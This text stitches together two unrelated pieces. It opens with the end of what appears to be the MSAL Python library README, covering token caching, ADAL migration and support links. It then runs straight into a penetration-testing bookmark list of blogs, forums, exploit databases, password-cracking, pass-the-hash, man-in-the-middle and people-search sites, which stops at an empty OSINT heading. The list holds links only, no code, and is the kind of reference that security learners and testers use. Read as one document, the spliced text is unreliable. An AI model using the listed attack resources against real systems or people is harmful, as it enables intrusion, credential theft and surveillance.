PublicClientApplication( "your_client_id", authority="https://login.microsoftonline.com/Enter_the_Tenant_Name_Here") ``` Later, each time you would want an access token, you start by: ```python result = None # It is just an initial value. Please follow instructions below. ``` 2. The API model in MSAL provides you explicit control on how to utilize token cache. This cache part is technically optional, but we highly recommend you to harness the power of MSAL cache. It will automatically handle the token refresh for you. ```python # We now check the cache to see # whether we already have some accounts that the end user already used to sign in before. accounts = app.get_accounts() if accounts: # If so, you could then somehow display these accounts and let end user choose print("Pick the account you want to use to proceed:") for a in accounts: print(a["username"]) # Assuming the end user chose this one chosen = accounts[0] # Now let's try to find a token in cache for this account result = app.acquire_token_silent(["your_scope"], account=chosen) ``` 3. Either there is no suitable token in the cache, or you chose to skip the previous step, now it is time to actually send a request to AAD to obtain a token. There are different methods based on your client type and scenario. Here we demonstrate a placeholder flow. ```python if not result: # So no suitable token exists in cache. Let's get a new one from AAD. result = app.acquire_token_by_one_of_the_actual_method(..., scopes=["User.Read"]) if "access_token" in result: print(result["access_token"]) # Yay! else: print(result.get("error")) print(result.get("error_description")) print(result.get("correlation_id")) # You may need this when reporting a bug ``` Refer the [Wiki](https://github.com/AzureAD/microsoft-authentication-library-for-python/wiki) pages for more details on the MSAL Python functionality and usage. ## Migrating from ADAL If your application is using ADAL Python, we recommend you to update to use MSAL Python. No new feature work will be done in ADAL Python. See the [ADAL to MSAL migration](https://github.com/AzureAD/microsoft-authentication-library-for-python/wiki/Migrate-to-MSAL-Python) guide. ## Roadmap You can follow the latest updates and plans for MSAL Python in the [Roadmap](https://github.com/AzureAD/microsoft-authentication-library-for-python/wiki/Roadmap) published on our Wiki. ## Samples and Documentation MSAL Python supports multiple [application types and authentication scenarios](https://docs.microsoft.com/azure/active-directory/develop/authentication-flows-app-scenarios). The generic documents on [Auth Scenarios](https://docs.microsoft.com/azure/active-directory/develop/authentication-scenarios) and [Auth protocols](https://docs.microsoft.com/azure/active-directory/develop/active-directory-v2-protocols) are recommended reading. We provide a [full suite of sample applications](https://aka.ms/aaddevsamplesv2) and [documentation](https://aka.ms/aaddevv2) to help you get started with learning the Microsoft identity platform. ## Community Help and Support We leverage Stack Overflow to work with the community on supporting Azure Active Directory and its SDKs, including this one! We highly recommend you ask your questions on Stack Overflow (we're all on there!) Also browser existing issues to see if someone has had your question before. We recommend you use the "msal" tag so we can see it! Here is the latest Q&A on Stack Overflow for MSAL: [http://stackoverflow.com/questions/tagged/msal](http://stackoverflow.com/questions/tagged/msal) ## Submit Feedback We'd like your thoughts on this library. Please complete [this short survey.](https://forms.office.com/r/TMjZkDbzjY) ## Security Reporting If you find a security issue with our libraries or services please report it to [[email protected]](mailto:[email protected]) with as much detail as possible. Your submission may be eligible for a bounty through the [Microsoft Bounty](http://aka.ms/bugbounty) program. Please do not post security issues to GitHub Issues or any other public site. We will contact you shortly upon receiving the information. We encourage you to get notifications of when security incidents occur by visiting [this page](https://technet.microsoft.com/security/dd252948) and subscribing to Security Advisory Alerts. ## Contributing All code is licensed under the MIT license and we triage actively on GitHub. We enthusiastically welcome contributions and feedback. Please read the [contributing guide](./contributing.md) before starting. ## We Value and Adhere to the Microsoft Open Source Code of Conduct This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or contact [[email protected]](mailto:[email protected]) with any additional questions or comments.
Hacking/Penetrating tester bookmark collection ============================================== This is a collection of Pentest/Hacker sites. It is originally created by Jason Haddix. ## Blogs worth it What the title says. There are a LOT of pentesting blogs, these are the ones i monitor constantly and value in the actual day to day testing work. * [http://carnal0wnage.blogspot.com/](http://carnal0wnage.blogspot.com/) * [http://www.mcgrewsecurity.com/](http://www.mcgrewsecurity.com/) * [http://www.gnucitizen.org/blog/](http://www.gnucitizen.org/blog/) * [http://www.darknet.org.uk/](http://www.darknet.org.uk/) * [http://spylogic.net/](http://spylogic.net/) * [http://taosecurity.blogspot.com/](http://taosecurity.blogspot.com/) * [http://www.room362.com/](http://www.room362.com/) * [http://blog.sipvicious.org/](http://blog.sipvicious.org/) * [http://blog.portswigger.net/](http://blog.portswigger.net/) * [http://pentestmonkey.net/blog/](http://pentestmonkey.net/blog/) * [http://jeremiahgrossman.blogspot.com/](http://jeremiahgrossman.blogspot.com/) * [http://i8jesus.com/](http://i8jesus.com/) * [http://blog.c22.cc/](http://blog.c22.cc/) * [http://www.skullsecurity.org/blog/](http://www.skullsecurity.org/blog/) * [http://blog.metasploit.com/](http://blog.metasploit.com/) * [http://www.darkoperator.com/](http://www.darkoperator.com/) * [http://blog.skeptikal.org/](http://blog.skeptikal.org/) * [http://preachsecurity.blogspot.com/](http://preachsecurity.blogspot.com/) * [http://www.tssci-security.com/](http://www.tssci-security.com/) * [http://www.gdssecurity.com/l/b/](http://www.gdssecurity.com/l/b/) * [http://websec.wordpress.com/](http://websec.wordpress.com/) * [http://bernardodamele.blogspot.com/](http://bernardodamele.blogspot.com/) * [http://laramies.blogspot.com/](http://laramies.blogspot.com/) * [http://www.spylogic.net/](http://www.spylogic.net/) * [http://blog.andlabs.org/](http://blog.andlabs.org/) * [http://xs-sniper.com/blog/](http://xs-sniper.com/blog/) * [http://www.commonexploits.com/](http://www.commonexploits.com/) * [http://www.sensepost.com/blog/](http://www.sensepost.com/blog/) * [http://wepma.blogspot.com/](http://wepma.blogspot.com/) * [http://exploit.co.il/](http://exploit.co.il/) * [http://securityreliks.wordpress.com/](http://securityreliks.wordpress.com/) * [http://www.madirish.net/index.html](http://www.madirish.net/index.html) * [http://sirdarckcat.blogspot.com/](http://sirdarckcat.blogspot.com/) * [http://reusablesec.blogspot.com/](http://reusablesec.blogspot.com/) * [http://myne-us.blogspot.com/](http://myne-us.blogspot.com/) * [http://www.notsosecure.com/](http://www.notsosecure.com/) * [http://blog.spiderlabs.com/](http://blog.spiderlabs.com/) * [http://www.corelan.be/](http://www.corelan.be/) * [http://www.digininja.org/](http://www.digininja.org/) * [http://www.pauldotcom.com/](http://www.pauldotcom.com/) * [http://www.attackvector.org/](http://www.attackvector.org/) * [http://deviating.net/](http://deviating.net/) * [http://www.alphaonelabs.com/](http://www.alphaonelabs.com/) * [http://www.smashingpasswords.com/](http://www.smashingpasswords.com/) * [http://wirewatcher.wordpress.com/](http://wirewatcher.wordpress.com/) * [http://gynvael.coldwind.pl/](http://gynvael.coldwind.pl/) * [http://www.nullthreat.net/](http://www.nullthreat.net/) * [http://www.question-defense.com/](http://www.question-defense.com/) * [http://archangelamael.blogspot.com/](http://archangelamael.blogspot.com/) * [http://memset.wordpress.com/](http://memset.wordpress.com/) * [http://sickness.tor.hu/](http://sickness.tor.hu/) * [http://punter-infosec.com/](http://punter-infosec.com/) * [http://www.securityninja.co.uk/](http://www.securityninja.co.uk/) * [http://securityandrisk.blogspot.com/](http://securityandrisk.blogspot.com/) * [http://esploit.blogspot.com/](http://esploit.blogspot.com/) * [http://www.pentestit.com/](http://www.pentestit.com/) ## Forums Created for forums that will help in both tool usage, syntax, attack techniques, and collection of scripts and tools. Needs some help. I don't really frequent too many underground forums but i actually find nice one-off scripts and info i can roll into my own code in these places. Would like to add more. * [http://sla.ckers.org/forum/index.php](http://sla.ckers.org/forum/index.php) * [http://www.ethicalhacker.net/](http://www.ethicalhacker.net/) * [http://www.backtrack-linux.org/forums/](http://www.backtrack-linux.org/forums/) * [http://www.elitehackers.info/forums/](http://www.elitehackers.info/forums/) * [http://www.hackthissite.org/forums/index.php](http://www.hackthissite.org/forums/index.php) * [http://securityoverride.com/forum/index.php](http://securityoverride.com/forum/index.php) * [http://www.iexploit.org/](http://www.iexploit.org/) * [http://bright-shadows.net/](http://bright-shadows.net/) * [http://www.governmentsecurity.org/forum/](http://www.governmentsecurity.org/forum/) * [http://forum.intern0t.net/](http://forum.intern0t.net/) ## Magazines * [http://www.net-security.org/insecuremag.php](http://www.net-security.org/insecuremag.php) * [http://hakin9.org/](http://hakin9.org/) ## Video * [http://www.hackernews.com/](http://www.hackernews.com/) * [http://www.securitytube.net/](http://www.securitytube.net/) * [http://www.irongeek.com/i.php?page=videos/aide-winter-2011](http://www.irongeek.com/i.php?page=videos/aide-winter-2011) * [http://avondale.good.net/dl/bd/](http://avondale.good.net/dl/bd/) * [http://achtbaan.nikhef.nl/27c3-stream/releases/mkv/](http://achtbaan.nikhef.nl/27c3-stream/releases/mkv/) * [http://www.youtube.com/user/ChRiStIaAn008](http://www.youtube.com/user/ChRiStIaAn008) * [http://www.youtube.com/user/HackingCons](http://www.youtube.com/user/HackingCons) ## Methodologies * [http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html) * [http://www.pentest-standard.org/index.php/Main_Page](http://www.pentest-standard.org/index.php/Main_Page) * [http://projects.webappsec.org/w/page/13246978/Threat-Classification](http://projects.webappsec.org/w/page/13246978/Threat-Classification) * [http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project](http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project) * [http://www.social-engineer.org/](http://www.social-engineer.org/) ## Presentations * [http://www.spylogic.net/2009/10/enterprise-open-source-intelligence-gathering-part-1-social-networks/](http://www.spylogic.net/2009/10/enterprise-open-source-intelligence-gathering-part-1-social-networks/) * [http://www.spylogic.net/2009/10/enterprise-open-source-intelligence-gathering-%E2%80%93-part-2-blogs-message-boards-and-metadata/](http://www.spylogic.net/2009/10/enterprise-open-source-intelligence-gathering-%E2%80%93-part-2-blogs-message-boards-and-metadata/) * [http://www.spylogic.net/2009/10/enterprise-open-source-intelligence-gathering-part-3-monitoring/](http://www.spylogic.net/2009/10/enterprise-open-source-intelligence-gathering-part-3-monitoring/) * [http://www.slideshare.net/Laramies/tactical-information-gathering](http://www.slideshare.net/Laramies/tactical-information-gathering) * [http://www.sans.org/reading_room/whitepapers/privacy/document_metadata_the_silent_killer__32974](http://www.sans.org/reading_room/whitepapers/privacy/document_metadata_the_silent_killer__32974) * [http://infond.blogspot.com/2010/05/toturial-footprinting.html](http://infond.blogspot.com/2010/05/toturial-footprinting.html) ## People and Organizational * [http://www.spokeo.com/](http://www.spokeo.com/) * [http://www.123people.com/](http://www.123people.com/) * [http://www.xing.com/](http://www.xing.com/) * [http://www.zoominfo.com/search](http://www.zoominfo.com/search) * [http://pipl.com/](http://pipl.com/) * [http://www.zabasearch.com/](http://www.zabasearch.com/) * [http://www.searchbug.com/default.aspx](http://www.searchbug.com/default.aspx) * [http://theultimates.com/](http://theultimates.com/) * [http://skipease.com/](http://skipease.com/) * [http://addictomatic.com/](http://addictomatic.com/) * [http://socialmention.com/](http://socialmention.com/) * [http://entitycube.research.microsoft.com/](http://entitycube.research.microsoft.com/) * [http://www.yasni.com/](http://www.yasni.com/) * [http://tweepz.com/](http://tweepz.com/) * [http://tweepsearch.com/](http://tweepsearch.com/) * [http://www.glassdoor.com/index.htm](http://www.glassdoor.com/index.htm) * [http://www.jigsaw.com/](http://www.jigsaw.com/) * [http://searchwww.sec.gov/EDGARFSClient/jsp/EDGAR_MainAccess.jsp](http://searchwww.sec.gov/EDGARFSClient/jsp/EDGAR_MainAccess.jsp) * [http://www.tineye.com/](http://www.tineye.com/) * [http://www.peekyou.com/](http://www.peekyou.com/) * [http://picfog.com/](http://picfog.com/) * [http://twapperkeeper.com/index.php](http://twapperkeeper.com/index.php) ## Infrastructure * [http://uptime.netcraft.com/](http://uptime.netcraft.com/) * [http://www.serversniff.net/](http://www.serversniff.net/) * [http://www.domaintools.com/](http://www.domaintools.com/) * [http://centralops.net/co/](http://centralops.net/co/) * [http://hackerfantastic.com/](http://hackerfantastic.com/) * [http://whois.webhosting.info/](http://whois.webhosting.info/) * [https://www.ssllabs.com/ssldb/analyze.html](https://www.ssllabs.com/ssldb/analyze.html) * [http://www.clez.net/](http://www.clez.net/) * [http://www.my-ip-neighbors.com/](http://www.my-ip-neighbors.com/) * [http://www.shodanhq.com/](http://www.shodanhq.com/) * [http://www.exploit-db.com/google-dorks/](http://www.exploit-db.com/google-dorks/) * [http://www.hackersforcharity.org/ghdb/](http://www.hackersforcharity.org/ghdb/) ## Exploits and Advisories * [http://www.exploit-db.com/](http://www.exploit-db.com/) * [http://www.cvedetails.com/](http://www.cvedetails.com/) * [http://www.packetstormsecurity.org/](http://www.packetstormsecurity.org/) * [http://www.securityforest.com/wiki/index.php/Main_Page](http://www.securityforest.com/wiki/index.php/Main_Page) * [http://www.securityfocus.com/bid](http://www.securityfocus.com/bid) * [http://nvd.nist.gov/](http://nvd.nist.gov/) * [http://osvdb.org/](http://osvdb.org/) * [http://www.nullbyte.org.il/Index.html](http://www.nullbyte.org.il/Index.html) * [http://secdocs.lonerunners.net/](http://secdocs.lonerunners.net/) * [http://www.phenoelit-us.org/whatSAP/index.html](http://www.phenoelit-us.org/whatSAP/index.html) * [http://secunia.com/](http://secunia.com/) * [http://cve.mitre.org/](http://cve.mitre.org/) ## Cheatsheets and Syntax * [http://cirt.net/ports_dl.php?export=services](http://cirt.net/ports_dl.php?export=services) * [http://www.cheat-sheets.org/](http://www.cheat-sheets.org/) * [http://blog.securitymonks.com/2009/08/15/whats-in-your-folder-security-cheat-sheets/](http://blog.securitymonks.com/2009/08/15/whats-in-your-folder-security-cheat-sheets/) ## Agile Hacking * [http://www.gnucitizen.org/blog/agile-hacking-a-homegrown-telnet-based-portscanner/](http://www.gnucitizen.org/blog/agile-hacking-a-homegrown-telnet-based-portscanner/) * [http://blog.commandlinekungfu.com/](http://blog.commandlinekungfu.com/) * [http://www.securityaegis.com/simple-yet-effective-directory-bruteforcing/](http://www.securityaegis.com/simple-yet-effective-directory-bruteforcing/) * [http://isc.sans.edu/diary.html?storyid=2376](http://isc.sans.edu/diary.html?storyid=2376) * [http://isc.sans.edu/diary.html?storyid=1229](http://isc.sans.edu/diary.html?storyid=1229) * [http://ss64.com/nt/](http://ss64.com/nt/) * [http://pauldotcom.com/2010/02/running-a-command-on-every-mac.html](http://pauldotcom.com/2010/02/running-a-command-on-every-mac.html) * [http://synjunkie.blogspot.com/2008/03/command-line-ninjitsu.html](http://synjunkie.blogspot.com/2008/03/command-line-ninjitsu.html) * [http://www.zonbi.org/2010/06/09/wmic-the-other-other-white-meat/](http://www.zonbi.org/2010/06/09/wmic-the-other-other-white-meat/) * [http://rstcenter.com/forum/22324-hacking-without-tools-windows.rst](http://rstcenter.com/forum/22324-hacking-without-tools-windows.rst) * [http://www.coresecurity.com/files/attachments/Core_Define_and_Win_Cmd_Line.pdf](http://www.coresecurity.com/files/attachments/Core_Define_and_Win_Cmd_Line.pdf) * [http://www.scribd.com/Penetration-Testing-Ninjitsu2-Infrastructure-and-Netcat-without-Netcat/d/3064507](http://www.scribd.com/Penetration-Testing-Ninjitsu2-Infrastructure-and-Netcat-without-Netcat/d/3064507) * [http://www.pentesterscripting.com/](http://www.pentesterscripting.com/) * [http://www.sans.org/reading_room/whitepapers/hackers/windows-script-host-hack-windows_33583](http://www.sans.org/reading_room/whitepapers/hackers/windows-script-host-hack-windows_33583) * [http://www.blackhat.com/presentations/bh-dc-10/Bannedit/BlackHat-DC-2010-Bannedit-Advanced-Command-Injection-Exploitation-1-wp.pdf](http://www.blackhat.com/presentations/bh-dc-10/Bannedit/BlackHat-DC-2010-Bannedit-Advanced-Command-Injection-Exploitation-1-wp.pdf) ## OS and Scripts * [http://en.wikipedia.org/wiki/IPv4_subnetting_reference](http://en.wikipedia.org/wiki/IPv4_subnetting_reference) * [http://www.nixtutor.com/linux/all-the-best-linux-cheat-sheets/](http://www.nixtutor.com/linux/all-the-best-linux-cheat-sheets/) * [http://shelldorado.com/shelltips/beginner.html](http://shelldorado.com/shelltips/beginner.html) * [http://www.linuxsurvival.com/](http://www.linuxsurvival.com/) * [http://mywiki.wooledge.org/BashPitfalls](http://mywiki.wooledge.org/BashPitfalls) * [http://rubular.com/](http://rubular.com/) * [http://www.iana.org/assignments/port-numbers](http://www.iana.org/assignments/port-numbers) * [http://www.robvanderwoude.com/ntadmincommands.php](http://www.robvanderwoude.com/ntadmincommands.php) * [http://www.nixtutor.com/linux/all-the-best-linux-cheat-sheets/](http://www.nixtutor.com/linux/all-the-best-linux-cheat-sheets/) ## Tools * [http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf](http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf) * [http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf](http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf) * [http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf](http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf) * [http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf](http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf) * [http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf](http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf) * [http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html](http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html) * [http://h.ackack.net/cheat-sheets/netcat](http://h.ackack.net/cheat-sheets/netcat) ## Distros * [http://www.backtrack-linux.org/](http://www.backtrack-linux.org/) * [http://www.matriux.com/](http://www.matriux.com/) * [http://samurai.inguardians.com/](http://samurai.inguardians.com/) * [http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project](http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project) * [https://pentoo.ch/](https://pentoo.ch/) * [http://www.hackfromacave.com/articles_and_adventures/katana_v2_release.html](http://www.hackfromacave.com/articles_and_adventures/katana_v2_release.html) * [http://www.piotrbania.com/all/kon-boot/](http://www.piotrbania.com/all/kon-boot/) * [http://www.linuxfromscratch.org/](http://www.linuxfromscratch.org/) * [http://sumolinux.suntzudata.com/](http://sumolinux.suntzudata.com/) * [http://blog.0x0e.org/2009/11/20/pentesting-with-an-ubuntu-box/#comments](http://blog.0x0e.org/2009/11/20/pentesting-with-an-ubuntu-box/#comments) * [http://www.backbox.org/](http://www.backbox.org/) ## Labs ## ISOs and VMs * [http://sourceforge.net/projects/websecuritydojo/](http://sourceforge.net/projects/websecuritydojo/) * [http://code.google.com/p/owaspbwa/wiki/ProjectSummary](http://code.google.com/p/owaspbwa/wiki/ProjectSummary) * [http://heorot.net/livecds/](http://heorot.net/livecds/) * [http://informatica.uv.es/~carlos/docencia/netinvm/](http://informatica.uv.es/~carlos/docencia/netinvm/) * [http://www.bonsai-sec.com/en/research/moth.php](http://www.bonsai-sec.com/en/research/moth.php) * [http://blog.metasploit.com/2010/05/introducing-metasploitable.html](http://blog.metasploit.com/2010/05/introducing-metasploitable.html) * [http://pynstrom.net/holynix.php](http://pynstrom.net/holynix.php) * [http://gnacktrack.co.uk/download.php](http://gnacktrack.co.uk/download.php) * [http://sourceforge.net/projects/lampsecurity/files/](http://sourceforge.net/projects/lampsecurity/files/) * [https://www.hacking-lab.com/news/newspage/livecd-v4.3-available.html](https://www.hacking-lab.com/news/newspage/livecd-v4.3-available.html) * [http://sourceforge.net/projects/virtualhacking/files/](http://sourceforge.net/projects/virtualhacking/files/) * [http://www.badstore.net/](http://www.badstore.net/) * [http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10](http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10) * [http://www.dvwa.co.uk/](http://www.dvwa.co.uk/) * [http://sourceforge.net/projects/thebutterflytmp/](http://sourceforge.net/projects/thebutterflytmp/) ## Vulnerable Software * [http://www.oldapps.com/](http://www.oldapps.com/) * [http://www.oldversion.com/](http://www.oldversion.com/) * [http://www.exploit-db.com/webapps/](http://www.exploit-db.com/webapps/) * [http://code.google.com/p/wavsep/downloads/list](http://code.google.com/p/wavsep/downloads/list) * [http://www.owasp.org/index.php/Owasp_SiteGenerator](http://www.owasp.org/index.php/Owasp_SiteGenerator) * [http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx](http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx) * [http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx](http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx) * [http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx](http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx) * [http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx](http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx) ## Test Sites * [http://www.webscantest.com/](http://www.webscantest.com/) * [http://crackme.cenzic.com/Kelev/view/home.php](http://crackme.cenzic.com/Kelev/view/home.php) * [http://zero.webappsecurity.com/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com](http://zero.webappsecurity.com/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com) * [http://testaspnet.vulnweb.com/](http://testaspnet.vulnweb.com/) * [http://testasp.vulnweb.com/](http://testasp.vulnweb.com/) * [http://testphp.vulnweb.com/](http://testphp.vulnweb.com/) * [http://demo.testfire.net/](http://demo.testfire.net/) * [http://hackme.ntobjectives.com/](http://hackme.ntobjectives.com/) ## Exploitation Intro If you'd like to get into exploit dev, these are really the guides and docs that will start you off in the right direction. Since Exploit dev is not my primary occupation this section could always use help. * [http://myne-us.blogspot.com/2010/08/from-0x90-to-0x4c454554-journey-into.html](http://myne-us.blogspot.com/2010/08/from-0x90-to-0x4c454554-journey-into.html) * [http://www.mgraziano.info/docs/stsi2010.pdf](http://www.mgraziano.info/docs/stsi2010.pdf) * [http://www.abysssec.com/blog/2010/05/past-present-future-of-windows-exploitation/](http://www.abysssec.com/blog/2010/05/past-present-future-of-windows-exploitation/) * [http://www.ethicalhacker.net/content/view/122/2/](http://www.ethicalhacker.net/content/view/122/2/) * [http://code.google.com/p/it-sec-catalog/wiki/Exploitation](http://code.google.com/p/it-sec-catalog/wiki/Exploitation) * [http://x9090.blogspot.com/2010/03/tutorial-exploit-writting-tutorial-from.html](http://x9090.blogspot.com/2010/03/tutorial-exploit-writting-tutorial-from.html) * [http://ref.x86asm.net/index.html](http://ref.x86asm.net/index.html) ## Reverse Engineering & Malware * [http://www.woodmann.com/TiGa/idaseries.html](http://www.woodmann.com/TiGa/idaseries.html) * [http://www.binary-auditing.com/](http://www.binary-auditing.com/) * [http://visi.kenshoto.com/](http://visi.kenshoto.com/) * [http://www.radare.org/y/](http://www.radare.org/y/) * [http://www.offensivecomputing.net/](http://www.offensivecomputing.net/) ## Passwords and Hashes * [http://www.irongeek.com/i.php?page=videos/password-exploitation-class](http://www.irongeek.com/i.php?page=videos/password-exploitation-class) * [http://cirt.net/passwords](http://cirt.net/passwords) * [http://sinbadsecurity.blogspot.com/2008/10/ms-sql-server-password-recovery.html](http://sinbadsecurity.blogspot.com/2008/10/ms-sql-server-password-recovery.html) * [http://www.foofus.net/~jmk/medusa/medusa-smbnt.html](http://www.foofus.net/~jmk/medusa/medusa-smbnt.html) * [http://www.foofus.net/?page_id=63](http://www.foofus.net/?page_id=63) * [http://hashcrack.blogspot.com/](http://hashcrack.blogspot.com/) * [http://www.nirsoft.net/articles/saved_password_location.html](http://www.nirsoft.net/articles/saved_password_location.html) * [http://www.onlinehashcrack.com/](http://www.onlinehashcrack.com/) * [http://www.md5this.com/list.php?](http://www.md5this.com/list.php?) * [http://www.virus.org/default-password](http://www.virus.org/default-password) * [http://www.phenoelit-us.org/dpl/dpl.html](http://www.phenoelit-us.org/dpl/dpl.html) * [http://news.electricalchemy.net/2009/10/cracking-passwords-in-cloud.html](http://news.electricalchemy.net/2009/10/cracking-passwords-in-cloud.html) ## Wordlists * [http://contest.korelogic.com/wordlists.html](http://contest.korelogic.com/wordlists.html) * [http://packetstormsecurity.org/Crackers/wordlists/](http://packetstormsecurity.org/Crackers/wordlists/) * [http://www.skullsecurity.org/wiki/index.php/Passwords](http://www.skullsecurity.org/wiki/index.php/Passwords) * [http://www.ericheitzman.com/passwd/passwords/](http://www.ericheitzman.com/passwd/passwords/) ## Pass the Hash * [http://www.sans.org/reading_room/whitepapers/testing/pass-the-hash-attacks-tools-mitigation_33283](http://www.sans.org/reading_room/whitepapers/testing/pass-the-hash-attacks-tools-mitigation_33283) * [http://www.sans.org/reading_room/whitepapers/testing/crack-pass-hash_33219](http://www.sans.org/reading_room/whitepapers/testing/crack-pass-hash_33219) * [http://carnal0wnage.blogspot.com/2008/03/using-pash-hash-toolkit.html](http://carnal0wnage.blogspot.com/2008/03/using-pash-hash-toolkit.html) ## MiTM * [http://www.giac.org/certified_professionals/practicals/gsec/0810.php](http://www.giac.org/certified_professionals/practicals/gsec/0810.php) * [http://www.linuxsecurity.com/docs/PDF/dsniff-n-mirror.pdf](http://www.linuxsecurity.com/docs/PDF/dsniff-n-mirror.pdf) * [http://www.cs.uiuc.edu/class/sp08/cs498sh/slides/dsniff.pdf](http://www.cs.uiuc.edu/class/sp08/cs498sh/slides/dsniff.pdf) * [http://www.techvibes.com/blog/a-hackers-story-let-me-tell-you-just-how-easily-i-can-steal-your-personal-data](http://www.techvibes.com/blog/a-hackers-story-let-me-tell-you-just-how-easily-i-can-steal-your-personal-data) * [http://www.mindcenter.net/uploads/ECCE101.pdf](http://www.mindcenter.net/uploads/ECCE101.pdf) * [http://toorcon.org/pres12/3.pdf](http://toorcon.org/pres12/3.pdf) * [http://media.techtarget.com/searchUnifiedCommunications/downloads/Seven_Deadliest_UC_Attacks_Ch3.pdf](http://media.techtarget.com/searchUnifiedCommunications/downloads/Seven_Deadliest_UC_Attacks_Ch3.pdf) * [http://packetstormsecurity.org/papers/wireless/cracking-air.pdf](http://packetstormsecurity.org/papers/wireless/cracking-air.pdf) * [http://www.blackhat.com/presentations/bh-europe-03/bh-europe-03-valleri.pdf](http://www.blackhat.com/presentations/bh-europe-03/bh-europe-03-valleri.pdf) * [http://www.oact.inaf.it/ws-ssri/Costa.pdf](http://www.oact.inaf.it/ws-ssri/Costa.pdf) * [http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-sam_bowne-hijacking_web_2.0.pdf](http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-sam_bowne-hijacking_web_2.0.pdf) * [http://mcafeeseminar.com/focus/downloads/Live_Hacking.pdf](http://mcafeeseminar.com/focus/downloads/Live_Hacking.pdf) * [http://www.seanobriain.com/docs/PasstheParcel-MITMGuide.pdf](http://www.seanobriain.com/docs/PasstheParcel-MITMGuide.pdf) * [http://www.more.net/sites/default/files/2010JohnStrandKeynote.pdf](http://www.more.net/sites/default/files/2010JohnStrandKeynote.pdf) * [http://www.leetupload.com/database/Misc/Papers/Asta%20la%20Vista/18.Ettercap_Spoof.pdf](http://www.leetupload.com/database/Misc/Papers/Asta%20la%20Vista/18.Ettercap_Spoof.pdf) * [http://bandwidthco.com/whitepapers/netforensics/arp/EtterCap%20ARP%20Spoofing%20&%20Beyond.pdf](http://bandwidthco.com/whitepapers/netforensics/arp/EtterCap%20ARP%20Spoofing%20&%20Beyond.pdf) * [http://bandwidthco.com/whitepapers/netforensics/arp/Fun%20With%20EtterCap%20Filters.pdf](http://bandwidthco.com/whitepapers/netforensics/arp/Fun%20With%20EtterCap%20Filters.pdf) * [http://www.iac.iastate.edu/iasg/libarchive/0910/The_Magic_of_Ettercap/The_Magic_of_Ettercap.pdf](http://www.iac.iastate.edu/iasg/libarchive/0910/The_Magic_of_Ettercap/The_Magic_of_Ettercap.pdf) * [http://articles.manugarg.com/arp_spoofing.pdf](http://articles.manugarg.com/arp_spoofing.pdf) * [http://academy.delmar.edu/Courses/ITSY2430/eBooks/Ettercap(ManInTheMiddleAttack-tool).pdf](http://academy.delmar.edu/Courses/ITSY2430/eBooks/Ettercap(ManInTheMiddleAttack-tool).pdf) * [http://www.ucci.it/docs/ICTSecurity-2004-26.pdf](http://www.ucci.it/docs/ICTSecurity-2004-26.pdf) * [http://web.mac.com/opticrealm/iWeb/asurobot/My%20Cyber%20Attack%20Papers/My%20Cyber%20Attack%20Papers_files/ettercap_Nov_6_2005-1.pdf](http://web.mac.com/opticrealm/iWeb/asurobot/My%20Cyber%20Attack%20Papers/My%20Cyber%20Attack%20Papers_files/ettercap_Nov_6_2005-1.pdf) * [http://blog.spiderlabs.com/2010/12/thicknet.html](http://blog.spiderlabs.com/2010/12/thicknet.html) * [http://www.hackyeah.com/2010/10/ettercap-filters-with-metasploit-browser_autopwn/](http://www.hackyeah.com/2010/10/ettercap-filters-with-metasploit-browser_autopwn/) * [http://www.go4expert.com/forums/showthread.php?t=11842](http://www.go4expert.com/forums/showthread.php?t=11842) * [http://www.irongeek.com/i.php?page=security/ettercapfilter](http://www.irongeek.com/i.php?page=security/ettercapfilter) * [http://openmaniak.com/ettercap_filter.php](http://openmaniak.com/ettercap_filter.php) * [http://www.irongeek.com/i.php?page=videos/dns-spoofing-with-ettercap-pharming](http://www.irongeek.com/i.php?page=videos/dns-spoofing-with-ettercap-pharming) * [http://www.irongeek.com/i.php?page=videos/ettercap-plugins-find-ip-gw-discover-isolate](http://www.irongeek.com/i.php?page=videos/ettercap-plugins-find-ip-gw-discover-isolate) * [http://www.irongeek.com/i.php?page=videos/ettercapfiltervid1](http://www.irongeek.com/i.php?page=videos/ettercapfiltervid1) * [http://spareclockcycles.org/2010/06/10/sergio-proxy-released/](http://spareclockcycles.org/2010/06/10/sergio-proxy-released/) ## Tools ### OSINT * 